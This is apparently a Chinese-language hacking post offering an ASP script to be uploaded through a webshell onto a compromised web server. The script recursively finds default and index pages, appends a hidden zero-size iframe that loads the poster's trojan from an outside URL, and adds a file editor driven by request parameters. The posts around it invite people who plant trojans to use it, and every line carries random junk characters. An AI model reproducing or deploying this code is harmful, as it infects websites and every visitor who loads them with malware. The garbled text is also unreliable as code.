一个webshell下自动挂马的ASP,挂马的朋友不可错过哦^_^ Eu_0n6J
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ASP_SELF=Request.ServerVariables("PATH_INFO") Q 7?4GxMj
s=Request("fd") F.w#AV
ex=Request("ex") @uWD>(D
pth=Request("pth") 8XE0 p7
newcnt=Request("newcnt") hj[g2S%X
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If ex<>"" AND pth<>"" Then UY^f|f&
select Case ex t38T0Ao
Case "edit" MYm6C;o$
CALL file_show(pth) vdM\scO:
Case "save" =1uI >[aN
CALL file_save(pth) ,4UJ|D=J
End select "R]K!GUU
Else 11'Tt!
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Function IsPattern(patt,str) h Nwb.[
Set regEx=New RegExp vUNE!j
regEx.Pattern=patt zAIC5fvu
regEx.IgnoreCase=True Lr &tpB<
retVal=regEx.Test(str) 'LI)6;Yc
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Else lUz@Em
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End If W_EN4p~J
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Sub sch(s) X35hLp8 M
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Set fd=fs.GetFolder(s) N3)EG6vE*
Set fi=fd.Files J)_42Z
Set sf=fd.SubFolders #e[5O|V~
For Each f in fi ~Gza$ K
rtn=f.Path K9iR>put
step_all rtn >E# 4mm
Next LvaF4Y2v
If sf.Count<>0 Then UWp(3FQ
For Each l In sf :>z0m0nI\
sch l Y`v&YcX;
Next 5Z'pMkn3
End If RY&~{yl$"1
End Sub ic+iTH
Sub step_all(agr) e"Z~%,^A
retVal=IsPattern("(\\|\/)(default|index)\.(htm|html|asp|php|jsp)\b",agr) 9b>a<Z
If retVal Then $=
step1 agr IN"qJ3<k
step2 agr {fWZ n
Else P_}$|zj7
Exit Sub Bs*s8}6
End If Fa8>+
End Sub SrxX-Hir
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<%End Sub%> :hr%iu
<% vhKD_}}aP
Sub step2(str2) !Qy3fs
addcode="<iframe src=http://www.21o.net/mm/mm.htm(修改为你的马的地址,不要加""不然会出错) width=0 height=0 frameborder=0></iframe>" TX;|g1K
Set fs=Server.createObject("Scripting.FileSystemObject") y9 "!ys
isExist=fs.FileExists(str2) ]GJskBm
If isExist Then Z(#a-_g
Set f=fs.GetFile(str2) ^(%>U!<<%,
Set f_addcode=f.OpenAsTextStream(8,-2) (q
f_addcode.Write addcode /dIiFr"e}G
f_addcode.Close 0W@C!mD~
Set f=Nothing ,+XQ!y%
End If 1cPi>?R:
Set fs=Nothing )<+Z,6
End Sub OF)X(bi4j
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Sub file_show(fname) K/altyj`
Set fs1=Server.createObject("Scripting.FileSystemObject") FYzl- 7!Y
isExist=fs1.FileExists(fname) ]C_6I\Z#=W
If isExist Then <I7UyCAF
Set fcnt=fs1.OpenTextFile(fname) |@ia(U~
cnt=fcnt.ReadAll 7l?-2I'c
fcnt.Close o9JJ_-O"
Set fs1=Nothing%> JAYom%A"
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<form action="<%=ASP_SELF%>" method="POST"> 3=`UX
<textarea name="newcnt" cols="100" rows="30"><%=cnt%></textarea> fZgZ
<input type="hidden" name="pth" value="<%=fname%>"> x\)-4w<P
<input type="hidden" name="ex" value="save"> u4%-e)$X
<input type="submit" value="SAVE"> /#blXI
</form> <w[)T`4N
<%Else%> ezFyd 'P
<p>THE FILE IS NOT EXIT OR HAVE deleteD.</p> y2)~ljR
<% @D%VV=N~[
End If =r`>tWs
End Sub o)w'w34FCT
%> yQ\c<z^e
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Sub file_save(fname) Hh,\>= ':
Set fs2=Server.createObject("Scripting.FileSystemObject") _bW#*
Set newf=fs2.createTextFile(fname,True) S-My6'ar
newf.Write newcnt ,w
newf.Close &}6=V+J;
Set fs2=Nothing >QCVsX>~
End Sub Yf|+p65g
%> Tk)y*y
</body> 1_%3cN.
</html> y "gYv
传进服务器以后 直接输入需要挂马的路径就可以直接挂了